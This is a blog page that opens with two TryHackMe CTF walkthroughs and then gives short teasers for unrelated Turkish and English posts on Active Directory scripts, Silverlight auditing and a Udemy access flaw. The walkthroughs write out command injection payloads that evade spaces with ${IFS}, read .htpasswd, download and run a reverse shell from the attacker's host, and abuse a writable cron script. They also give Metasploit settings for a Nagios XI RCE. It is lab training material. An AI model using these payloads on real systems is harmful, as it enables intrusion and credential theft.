TryHackMe — ConvertMyVideo

It’s a very good lab and you can test lots of different topics at the same time;

# I scan with nmap

sudo nmap -sV 10.10.124.59

# find web port to open and browse it;

# in parallel I start dirbsearch to find folders

sudo ./dirsearch.py -u http://10.10.124.59 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e js,php,html -x 403,404

# so first question answer we find quickly /admin folder our secret folder;

#so I understand basic Authentication and user credential need; I started password attack and also the as same time I started to web application testing

in Burp i start request manipulations ;

First thing i investigate yt_url part when i write

# |ls

i can execute my command, and after that, i think very simple room to solve;

#but after that i sent lots of Linux command and take every time to error; so i more create error and search from internet youtube-dl

# i find source code off youtube_dl

ytdl-org/youtube-dlyoutube-dl – download videos from youtube.com or other video platforms To install it right away for all UNIX users…github.com

# my test i every time took error about not true parameter and options; so when looked github page i saw valid options

# and send first option — help over burp

yt_url — help

and bingoo — help options worked for me; all help information i can saw in response ,

# after that step i try to send more powerful command which one help to reach my aim, and i spend 1,5 about that;

#main problem simple command like ls, id executed but when i try to execute ls -al every time take syntax errors; so i more focus sent command without space;

#Google best helper me search :

“How to send a command with arguments without spaces?”

How to send a command with arguments without spaces?Thanks for contributing an answer to Unix & Linux Stack Exchange! Please be sure to answer the question. Provide…unix.stackexchange.com

and find a true perspective

cat${IFS}file.txt

So using ${IFS} i can send command using without space; but before this job i send all my request burp repeater to more efficiently manipulation;

#please be careful that part because our parameter must be;

— version;ls${IFS}-al;

note: (- -) in the display looks like — and also you can use all option — help; — execute, — version

#so i can access all command that method; now i try to access /admin folder;

yt_url= — version;ls${IFS}/var/www/html/admin${IFS}-al;

# found .htpasswd and flag.txt

for reading flag.txt

yt_url= — version;cat${IFS}/var/www/html/admin/flag.txt;

and as the same method when you look to .htpasswd;

yt_url= — version;cat${IFS}/var/www/html/admin/.htpasswd;

you can find user;

Now i need to ever shell to execute for that reason i prepare bash based reverse shell.sh in my kali computer.

and start my kali

python -m SimpleHTTPServer 8090

and over burp vulnerable machine i try to install that file

yt_url= — version;wget${IFS}http://10.9.32.166:8090/shell.sh;

— version;chmod${IFS}755${IFS}/var/www/html/shell.sh;

so i installed and give execution permission after that i start in my kali nc to listen;

when over burp start shell.sh have shell 🙂

–version;bash${IFS}shell.sh;

#when i have console i look all method spend 2 hours and last i find one way only change; is there clean.sh script under temp folder; and some cronjob execute it periodically and editable from my self; (how can i know only CTF experience)

so i try to execute that command;

echo ‘ cat /root/root.txt >root-oldum’ >>clean.sh

and bingo i have root-oldum file as the same directory includes root.txt flag.

Super CTF Thank you overjt

TryHackME — NAX- walkthrough

ROOM NAX https://tryhackme.com/room/nax

  1. Firstly need to read carefully the description of the room;

Nax

Identify the critical security flaw in the most powerful and trusted network monitoring software on the market, that allows a user authenticated execute remote code execution.

2. I started to search best network monitoring tools ;

https://www.pcwdld.com/best-network-monitoring-tools-and-software

3. This name so similar to our room Nagios XI (NAX)

4. Start port scanning

sudo nmap -sV 10.10.87.52

5. http://10.10.87.52

6. Welcome to Elements look like (periodic table ) so I start to search numbers;

https://www.ptable.com/

7. I create table convert element code to element number;

8. After that, I tried ascii to text

http://www.unit-conversion.info/texttools/ascii/

9. We find the first answer ;

10. Try to access http://10.10.87.52/PI3T.PNg

11. Extract EXIF info:

12. We find 2 answers:

13. After that I try to find known URLs and may be directories so I try dirbsearch;

./dirsearch.py -u http://10.10.87.52/ -e php,html

14. Find the default login page;

http://10.10.87.52/nagiosxi/login.php?redirect=/nagiosxi/index.php%3f&noauth=1

15. I did a small google search about nagiosxi default user name and password; and find default user name: nagiosadmin , password: PASSW0RD (with zero)

16. I try to #3 answer with the default username is ok.

17. But default username and password not true to login. After that hardest stage is started for me. What is the password? and how can I find it?. I spend 2,5 hours to find an answer.

18. I did google searching; focusing to picture which I found and steganography; I try all tools in that sites which wrote;

https://0xrick.github.io/lists/stego/

19. And find an interesting result which before I never heard

20. This method names look likes our Piet Mondrian names; so I more focus google search npiet online and found that site;

https://www.bertnase.de/npiet/npiet-execute.php

21. Below part of the picture, I found a password which starts %,

22. I was sure that system Nagios XI and start searchsploit;

23. So we find answer #5

24. Now start to configure metasploit, and configure;

Msf5> use exploit/linux/http/nagios_xi_authenticated_rce

Msf5> options

Msf5> set PASSWORD XXXXXXXXXXXXXXXX

Msf5> set RHOSTS 10.10.87.52

Msf5> set LHOSTS 10.9.32.166

25. We found #7 answer;

26. After run exploit;

Uraaaaa!!

Silverlight Uygulamalari Icin Guvenlik Denetimi Yaklasimi

Microsoft Silverlight, ağ uygulamaları için animasyon, vektör, 3d grafik ve görüntü oynatma imkanları sağlayan zengin internet uygulamaları geliştirme düzlemidir. Bir cok kurum tarafindan internal uygulamalarda tercih sebebidir. Bu tercih sebebinin nedeni ise bana gore ozellikle ust yoneticileri sunulacak kipir kipir grafikli surukle birakli tamamen gosterisli arayuzlerin gelistiriciler tarafindan rahatca hazirlanmasindan kaynaklanmatir. Okumaya devam et “Silverlight Uygulamalari Icin Guvenlik Denetimi Yaklasimi”

Check Active Directory Latency With Powershell

For managing large scale Active directory environment more important part checking and understanding replication quality. In this condition i used repadmin command to check replication healthy. But this command not enough to understand exactly replication finished time. So i start to search internet and find script to check active directory latency with poweshell (http://bsonposh.com/archives/276) when i started this script i understood this script not handle large scale of dc environment. and it’s enter loop if replication will not finished. Okumaya devam et “Check Active Directory Latency With Powershell”

Sunucu+Client Envanter Bilgilendirme Scripti

Özellikle Enterprise seviyede ve dağınık yapıda sistem yöneten arkadaşların günlük client sayıları,  sunucu sayıları, domainde kullanılan işletim sistemlerinin grouplanmış sayılarını otomatik olarak tespit edip belirlenen bir saatte sistem yöneticilerine html temelli bir rapor atan script aşağıda sunulmuştur. Okumaya devam et “Sunucu+Client Envanter Bilgilendirme Scripti”

Girişimciliğe Giriş

Konu başlığının çok iddialı olduğunun farkındayım amacım sizlere girişimciliği anlatmak değil bu yola adım atarken yaşadıklarımı yaşayacaklarımı hatalarımı doğrularımı paylaşmak olacaktır.

Yani sizlerle bir şeyleri paylaşırken bir çok şeyi de öğreneceğim. Kendi dilimden, kendi networkümden uzak bir ülkede (Rusya’da) yaşanan tecrübeleri yakından takip edebileceksiniz. En önemlisi ise bende kendi değişim sürecimi kayıt altına almış olacağım.

şimdiden bu süreçte beni destekleyen herkese çok teşekkür ederim.

Udemy Ucretli icerige ucretsiz erisim

Udemy gelistiricileri Turk olan , konu ve alanlarinda uzman olan yada uzman olduklarini dusununen kisiler tarafindan gelistirilen video egitim temelli kisisel gelisim platformudur. Site icerisinde ucretli ve ucretsiz bir cok harika icerige ulasabilirsiniz. Genel anlamda benimde cok kullandigim bir sitedir.

Yukarida kisaca sayfa hakkinda bir bilgilendirme gectikten sonra gelelim yazimizin ana konusuna.

Udemy sayfasi uzerinde parali icerikle satilan egitim serilerine hic bir ucret odemeden erismenizi sagliyacak surecsel ve mimarisel bir acigi sizlerle paylasacagim. Bu acik ile ilgili genel bilgilendirme Udemy security grubuna tarafimdan yapilmistir. Yazinin ilerleyen bolumlerinde bu surecide gorebilirsiniz.

Gelelim zafiyetminizin hayata gecirilmesine;

Okumaya devam et “Udemy Ucretli icerige ucretsiz erisim”

MVP Enterprise Security

Zorlu bir yilin arkasindan Enterprise Security alaninda MVP unvanina Microsoft Turkmenistan tarafindan aday gosterilmistim. 3 ocak 2015 tarihinde ise yeni yil hediyesi gibi MVP ligimin onaylandigi bilgisini bir maille aldim. Bu saygi deger unvani hakkiyla tasimaya calisacagim. Bu odulde destegi olan ozellikle Turkmenistan IT ekibime tesekkurlerimi sunarim.

Peki Nedir MVP? Microsofta gore;

The Microsoft Most Valuable Professional (MVP) Award is our way of saying thank you to exceptional, independent community leaders who share their passion, technical expertise, and real-world knowledge of Microsoft products with others. It is part of Microsoft’s commitment to supporting and enriching technical communities. Even before the rises of the Internet and social media, people have come together to willingly offer their ideas and best practices in technical communities.

Remote Active Directory /Exchange Administration with Windows PowerShell

Windows Server automatically installs the Active Directory Module for Windows PowerShell and Active Directory Administrative Center when you add the Active Directory Domain Services (AD DS) or Active Directory Lightweight Directory Services (AD LDS) role.

But if you like me you want to manage Active Directory from another computer at a remote location, and you can do so with the Active Directory Module and ADAC, as long as you are running Windows 7 on the remote computer. Okumaya devam et “Remote Active Directory /Exchange Administration with Windows PowerShell”